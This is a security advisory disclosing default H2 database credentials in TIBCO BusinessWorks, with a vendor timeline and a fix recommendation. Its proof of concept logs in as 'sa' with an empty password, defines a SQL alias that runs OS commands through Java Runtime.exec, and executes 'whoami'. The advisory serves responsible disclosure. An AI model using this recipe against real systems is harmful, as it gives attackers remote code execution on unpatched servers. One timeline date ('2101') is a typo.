usd-2021-0012 | TIBCO ActiveMatrix BusinessWorks


Advisory ID: usd-2021-0012
Affected Product: TIBCO BusinessWorks
Affected Version: 6.5.0 hotfix 10 build V159
Vulnerability Type: CWE-521: Weak Password Requirements
Security Risk: Critical
Vendor URL: https://www.tibco.com/
Vendor Status: addressed via guidance

Description

TIBCO ActiveMatrix BusinessWorks installs an H2 database by default. The admin user of this database has default credentials. The H2 database allows to create and execute arbitrary Java functions.

Default Credentials can often be found in configuration files or official manuals. Additionally, they may be looked up in other publicly available sources. Actively using default credentials is particularly dangerous because it provides attackers with a trivial entry point and does not require further technical understanding to get access to the system.

The TIBCO BusinessWorks installations features a "TIBCO Enterprise Administrator" (TEA). It seems that the default installation of this admin interface creates the vulnerable H2 service with default administrative credentials. H2 admins have remote code execution by design. The vulnerability is published as CVE-2018-10054 but never got fixed.

Proof of Concept (PoC)

1. Identify the service running an H2 database server. In the test environment this was running on port 23492. However, this could change for other systems.

2. Use a local instance of the H2 console to login to the database

3. In the login panel of the H2 console, use the following settings:

  • Driver Class: org.h2.Driver
  • JDBC URL: jdbc:h2:tcp://IP:PORT/~/test
  • User Name: sa
  • Password: empty
  • Click connect.

4. The UI allows to run SQL statements. Create an alias, which is nothing else than a Java method: 

create alias exec as '
String exec(String cmd) throws java.io.IOException,
java.lang.InterruptedException {

java.lang.Process process = java.lang.Runtime.getRuntime().exec(cmd);
StringBuilder output = new StringBuilder();
java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream()));

String line;
while ((line = reader.readLine()) != null) {
output.append(line + "\n");
}

int exitVal = process.waitFor();
if (exitVal == 0) {
return output.toString();
}
return "Error";

}

';

5. Call the alias with the following SQL statement:

call exec("whoami")

This returns:

tibco

Fix

The service should enforce the user to specify new credentials during installation.


References

Timeline

  • 2021-03-03: This vulnerability was identified by Konstantin Samuel.
  • 2101-04-15: Vulnerability information transmitted to vendor.
  • 2021-06-07: Vendor informs about ongoing triage and Fair Disclosure policy.
  • 2021-07-22: Vendor has addresses this issue via a public knowledge base article.
  • 2021-08-31: Security advisory released by usd AG.

Credits

This security vulnerability was found by Konstantin Samuel of usd AG.